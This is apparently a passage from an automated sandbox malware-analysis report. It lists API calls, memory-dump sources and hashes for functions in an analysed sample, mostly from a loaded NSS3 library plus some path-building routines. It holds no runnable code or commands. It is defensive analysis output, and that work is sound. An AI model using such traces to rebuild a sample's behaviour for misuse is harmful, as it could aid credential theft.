                                                                                          • Instruction Fuzzy Hash: D34129B2D04290A7EB214A189C84BBE32B8EF4271CF640525F854E7F81FF359949CAD3
                                                                                          Function 6CC5AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6CC09890: TlsGetValue.KERNEL32(?,?,?,6CC097EB), ref: 6CC0989E
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6CC5AF88
                                                                                          • _PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6CC5AFCE
                                                                                          • PR_SetPollableEvent.NSS3(?), ref: 6CC5AFD9
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6CC5AFEF
                                                                                          • _PR_MD_NOTIFY_CV.NSS3(?), ref: 6CC5B00F
                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6CC5B02F
                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6CC5B070
                                                                                          • PR_JoinThread.NSS3(?), ref: 6CC5B07B
                                                                                          • free.MOZGLUE(?), ref: 6CC5B084
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6CC5B09B
                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6CC5B0C4
                                                                                          • PR_JoinThread.NSS3(?), ref: 6CC5B0F3
                                                                                          • free.MOZGLUE(?), ref: 6CC5B0FC
                                                                                          • PR_JoinThread.NSS3(?), ref: 6CC5B137
                                                                                          • free.MOZGLUE(?), ref: 6CC5B140
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
                                                                                          • String ID:
                                                                                          • API String ID: 235599594-0
                                                                                          • Opcode ID: dcd8d103194fd42c6b723fde6e72c982d983f015f5ec199773a9a86fa939b64d
                                                                                          • Instruction ID: e2d8a4425abbf7627c93bfefb5e705f659d57c1381ab501f783e95122b709e33
                                                                                          • Opcode Fuzzy Hash: dcd8d103194fd42c6b723fde6e72c982d983f015f5ec199773a9a86fa939b64d
                                                                                          • Instruction Fuzzy Hash: E59181B5A00601CFCB04DF15C89095ABBF1FF4931876985A9D8199BB22F732FC66CB94
                                                                                          Function 6CB58DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TlsGetValue.KERNEL32(?,?), ref: 6CB58E22
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6CB58E36
                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6CB58E4F
                                                                                          • calloc.MOZGLUE(00000001,?,?,?), ref: 6CB58E78
                                                                                          • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CB58E9B
                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CB58EAC
                                                                                          • PL_ArenaAllocate.NSS3(?,?), ref: 6CB58EDE
                                                                                          • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CB58EF0
                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6CB58F00
                                                                                          • free.MOZGLUE(?), ref: 6CB58F0E
                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6CB58F39
                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6CB58F4A
                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6CB58F5B
                                                                                          • PR_Unlock.NSS3(?), ref: 6CB58F72
                                                                                          • PR_Unlock.NSS3(?), ref: 6CB58F82
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                          • String ID:
                                                                                          • API String ID: 1569127702-0
                                                                                          • Opcode ID: 4520f8ab20fa2f97929efbafe51016fc6979eab1446493238b591ac7347c114f
                                                                                          • Instruction ID: a02e119e832ca87624d24d0bf4aa2459f66565fc8d028439fe7f47454b4490a5
                                                                                          • Opcode Fuzzy Hash: 4520f8ab20fa2f97929efbafe51016fc6979eab1446493238b591ac7347c114f
                                                                                          • Instruction Fuzzy Hash: 435126B2E40255AFEB009F68CC8496EB7B9EF45358F94452AEC089B700E732ED65C7D1
                                                                                          Function 6CB7CE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PK11_DoesMechanism.NSS3(?,00000132), ref: 6CB7CE9E
                                                                                          • PK11_DoesMechanism.NSS3(?,00000321), ref: 6CB7CEBB
                                                                                          • PK11_DoesMechanism.NSS3(?,00001081), ref: 6CB7CED8
                                                                                          • PK11_DoesMechanism.NSS3(?,00000551), ref: 6CB7CEF5
                                                                                          • PK11_DoesMechanism.NSS3(?,00000651), ref: 6CB7CF12
                                                                                          • PK11_DoesMechanism.NSS3(?,00000321), ref: 6CB7CF2F
                                                                                          • PK11_DoesMechanism.NSS3(?,00000121), ref: 6CB7CF4C
                                                                                          • PK11_DoesMechanism.NSS3(?,00000400), ref: 6CB7CF69
                                                                                          • PK11_DoesMechanism.NSS3(?,00000341), ref: 6CB7CF86
                                                                                          • PK11_DoesMechanism.NSS3(?,00000311), ref: 6CB7CFA3
                                                                                          • PK11_DoesMechanism.NSS3(?,00000301), ref: 6CB7CFBC
                                                                                          • PK11_DoesMechanism.NSS3(?,00000331), ref: 6CB7CFD5
                                                                                          • PK11_DoesMechanism.NSS3(?,00000101), ref: 6CB7CFEE
                                                                                          • PK11_DoesMechanism.NSS3(?,00000141), ref: 6CB7D007
                                                                                          • PK11_DoesMechanism.NSS3(?,00001008), ref: 6CB7D021
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: DoesK11_Mechanism
                                                                                          • String ID:
                                                                                          • API String ID: 622698949-0
                                                                                          • Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
                                                                                          • Instruction ID: cbfd746231bdbc7fd87f81222b5b2203fffd8208d3c9e35142aca1febf01ba5a
                                                                                          • Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
                                                                                          • Instruction Fuzzy Hash: 72312D61B97D9027EF1D106A6C75B9E144A8B6734EF44103CFD0AF67C0F6859A1603AB
                                                                                          Function 6CC50FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_Lock.NSS3(?), ref: 6CC51000
                                                                                            • Part of subcall function 6CC09BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CB31A48), ref: 6CC09BB3
                                                                                            • Part of subcall function 6CC09BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CB31A48), ref: 6CC09BC8
                                                                                          • PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6CC51016
                                                                                            • Part of subcall function 6CBEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBEC2BF
                                                                                          • PR_Unlock.NSS3(?), ref: 6CC51021
                                                                                            • Part of subcall function 6CBEDD70: TlsGetValue.KERNEL32 ref: 6CBEDD8C
                                                                                            • Part of subcall function 6CBEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CBEDDB4
                                                                                          • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CC51046
                                                                                          • PR_Unlock.NSS3(?), ref: 6CC5106B
                                                                                          • PR_Lock.NSS3 ref: 6CC51079
                                                                                          • PR_Unlock.NSS3 ref: 6CC51096
                                                                                          • free.MOZGLUE(?), ref: 6CC510A7
                                                                                          • free.MOZGLUE(?), ref: 6CC510B4
                                                                                          • PR_DestroyCondVar.NSS3(?), ref: 6CC510BF
                                                                                          • PR_DestroyCondVar.NSS3(?), ref: 6CC510CA
                                                                                          • PR_DestroyCondVar.NSS3(?), ref: 6CC510D5
                                                                                          • PR_DestroyCondVar.NSS3(?), ref: 6CC510E0
                                                                                          • PR_DestroyLock.NSS3(?), ref: 6CC510EB
                                                                                          • free.MOZGLUE(?), ref: 6CC51105
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
                                                                                          • String ID:
                                                                                          • API String ID: 8544004-0
                                                                                          • Opcode ID: bea92d869c297737d06df8ac20e05c3005a4eeeffc0de5f82b5ed65db36b2bc9
                                                                                          • Instruction ID: b708ae7f1e05698947632132611f82623b7b819fb068be699e15eb40b3982fc1
                                                                                          • Opcode Fuzzy Hash: bea92d869c297737d06df8ac20e05c3005a4eeeffc0de5f82b5ed65db36b2bc9
                                                                                          • Instruction Fuzzy Hash: 663196B5A00451ABDB02AF19FD45A49BB71FF41358B884221E81943F61E732F978EBC6
                                                                                          Function 6CB8EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6CB8EE0B
                                                                                            • Part of subcall function 6CBA0BE0: malloc.MOZGLUE(6CB98D2D,?,00000000,?), ref: 6CBA0BF8
                                                                                            • Part of subcall function 6CBA0BE0: TlsGetValue.KERNEL32(6CB98D2D,?,00000000,?), ref: 6CBA0C15
                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB8EEE1
                                                                                            • Part of subcall function 6CB81D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CB81D7E
                                                                                            • Part of subcall function 6CB81D50: EnterCriticalSection.KERNEL32(?), ref: 6CB81D8E
                                                                                            • Part of subcall function 6CB81D50: PR_Unlock.NSS3(?), ref: 6CB81DD3
                                                                                          • TlsGetValue.KERNEL32 ref: 6CB8EE51
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6CB8EE65
                                                                                          • PR_Unlock.NSS3(?), ref: 6CB8EEA2
                                                                                          • free.MOZGLUE(?), ref: 6CB8EEBB
                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6CB8EED0
                                                                                          • PR_Unlock.NSS3(?), ref: 6CB8EF48
                                                                                          • free.MOZGLUE(?), ref: 6CB8EF68
                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6CB8EF7D
                                                                                          • PK11_DoesMechanism.NSS3(?,?), ref: 6CB8EFA4
                                                                                          • free.MOZGLUE(?), ref: 6CB8EFDA
                                                                                          • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CB8F055
                                                                                          • free.MOZGLUE(?), ref: 6CB8F060
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                          • String ID:
                                                                                          • API String ID: 2524771861-0
                                                                                          • Opcode ID: 6c436cbf313d03ef10667be2152827bf950bcbc1e048baf5a5b8d51ad211b877
                                                                                          • Instruction ID: 47841ffb8d82c257cd7b7763df161cd87176e4fc0813a7c65bf57525ea15b3e0
                                                                                          • Opcode Fuzzy Hash: 6c436cbf313d03ef10667be2152827bf950bcbc1e048baf5a5b8d51ad211b877
                                                                                          • Instruction Fuzzy Hash: 80818075A01289ABEF00DFA5DC85ADE7BB5FF08308F040024E919A7711E731E964CBA2
                                                                                          Function 6CB54CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PK11_SignatureLen.NSS3(?), ref: 6CB54D80
                                                                                          • PORT_Alloc_Util.NSS3(00000000), ref: 6CB54D95
                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6CB54DF2
                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB54E2C
                                                                                          • PR_SetError.NSS3(FFFFE028,00000000), ref: 6CB54E43
                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6CB54E58
                                                                                          • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CB54E85
                                                                                          • DER_Encode_Util.NSS3(?,?,6CCA05A4,00000000), ref: 6CB54EA7
                                                                                          • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CB54F17
                                                                                          • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CB54F45
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB54F62
                                                                                          • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CB54F7A
                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB54F89
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB54FC8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                          • String ID:
                                                                                          • API String ID: 2843999940-0
                                                                                          • Opcode ID: 2beb391c8093e7b0342f2ebbbad139fcb02e22bc246dcf6ba7ca4acb939bf212
                                                                                          • Instruction ID: 017da8d73f9117836e8889f3db2f96ba1f791e7798746d0ac274c59cce2169b4
                                                                                          • Opcode Fuzzy Hash: 2beb391c8093e7b0342f2ebbbad139fcb02e22bc246dcf6ba7ca4acb939bf212
                                                                                          • Instruction Fuzzy Hash: 9F81A171A08341AFEB01CF28D840B9BB7E4EB89358F548529F95DDB640E731E9258F92
                                                                                          Function 6CB3AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_EnterMonitor.NSS3 ref: 6CB3AF47
                                                                                            • Part of subcall function 6CC09090: TlsGetValue.KERNEL32 ref: 6CC090AB
                                                                                            • Part of subcall function 6CC09090: TlsGetValue.KERNEL32 ref: 6CC090C9
                                                                                            • Part of subcall function 6CC09090: EnterCriticalSection.KERNEL32 ref: 6CC090E5
                                                                                            • Part of subcall function 6CC09090: TlsGetValue.KERNEL32 ref: 6CC09116
                                                                                            • Part of subcall function 6CC09090: LeaveCriticalSection.KERNEL32 ref: 6CC0913F
                                                                                          • FreeLibrary.KERNEL32(?), ref: 6CB3AF6D
                                                                                          • free.MOZGLUE(?), ref: 6CB3AFA4
                                                                                          • free.MOZGLUE(?), ref: 6CB3AFAA
                                                                                          • PR_ExitMonitor.NSS3 ref: 6CB3AFB5
                                                                                          • PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6CB3AFF5
                                                                                          • PR_ExitMonitor.NSS3 ref: 6CB3B005
                                                                                          • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CB3B014
                                                                                          • PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6CB3B028
                                                                                          • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CB3B03C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
                                                                                          • String ID: %s decr => %d$Unloaded library %s
                                                                                          • API String ID: 4015679603-2877805755
                                                                                          • Opcode ID: c673c9836b1223909b58d2d7cc6ac6a06b93b3edfa4eec6fee0b372e23a3a8b1
                                                                                          • Instruction ID: 89b8b23174dd447c81df1e586305881168022dbd2070d7fa18978e26d9e371c1
                                                                                          • Opcode Fuzzy Hash: c673c9836b1223909b58d2d7cc6ac6a06b93b3edfa4eec6fee0b372e23a3a8b1
                                                                                          • Instruction Fuzzy Hash: 7B31F5B5B04160ABDF019FE5EC44A19B775EF05758B284225E80DC7A10F732E824CBE2
                                                                                          Function 6CB86C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CB8781D,00000000,6CB7BE2C,?,6CB86B1D,?,?,?,?,00000000,00000000,6CB8781D), ref: 6CB86C40
                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CB8781D,?,6CB7BE2C,?), ref: 6CB86C58
                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CB8781D), ref: 6CB86C6F
                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CB86C84
                                                                                          • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CB86C96
                                                                                            • Part of subcall function 6CB31240: TlsGetValue.KERNEL32(00000040,?,6CB3116C,NSPR_LOG_MODULES), ref: 6CB31267
                                                                                            • Part of subcall function 6CB31240: EnterCriticalSection.KERNEL32(?,?,?,6CB3116C,NSPR_LOG_MODULES), ref: 6CB3127C
                                                                                            • Part of subcall function 6CB31240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CB3116C,NSPR_LOG_MODULES), ref: 6CB31291
                                                                                            • Part of subcall function 6CB31240: PR_Unlock.NSS3(?,?,?,?,6CB3116C,NSPR_LOG_MODULES), ref: 6CB312A0
                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CB86CAA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                          • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                          • API String ID: 4221828374-3736768024
                                                                                          • Opcode ID: d75cc91dd65e652bb5c247a1cc86baf6fb59f29791e41ccf483682675edce21d
                                                                                          • Instruction ID: 10d2b2d9558f500944755600841b4a51160530250872a711870ead90b70c8102
                                                                                          • Opcode Fuzzy Hash: d75cc91dd65e652bb5c247a1cc86baf6fb59f29791e41ccf483682675edce21d
                                                                                          • Instruction Fuzzy Hash: 2F01A2B170339127EA102B7A5C4AF27395CDF4115CF140431FE09E0981FFA6E91485AA
                                                                                          Function 00410DE0 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • strtok_s.MSVCRT ref: 00410E17
                                                                                          • strtok_s.MSVCRT ref: 00411260
                                                                                            • Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,00816A50,?,004210DC,?,00000000), ref: 0041A1FB
                                                                                            • Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: strtok_s$lstrcpylstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 348468850-0
                                                                                          • Opcode ID: 8014720055c3d44d45c2ee13986b4f49da758f8c5a4ddf56eb1d99de4c5a71bc
                                                                                          • Instruction ID: 43f8ac416cb9b823db2283ba99bf4afb511f8f06efa02481fc3f2e7b5d6f774f
                                                                                          • Opcode Fuzzy Hash: 8014720055c3d44d45c2ee13986b4f49da758f8c5a4ddf56eb1d99de4c5a71bc
                                                                                          • Instruction Fuzzy Hash: B5C1C4B1900219ABCB14EF60DC89FDA7378BB64308F0045DEF50AA7251EA74AAD5CF95
                                                                                          Function 00413D90 Relevance: 19.7, APIs: 13, Instructions: 193stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00413DAE
                                                                                          • memset.MSVCRT ref: 00413DC5
                                                                                            • Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 00413DFC
                                                                                          • lstrcat.KERNEL32(?,0081A8B0), ref: 00413E1B
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00413E2F
                                                                                          • lstrcat.KERNEL32(?,0081A9D0), ref: 00413E43
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
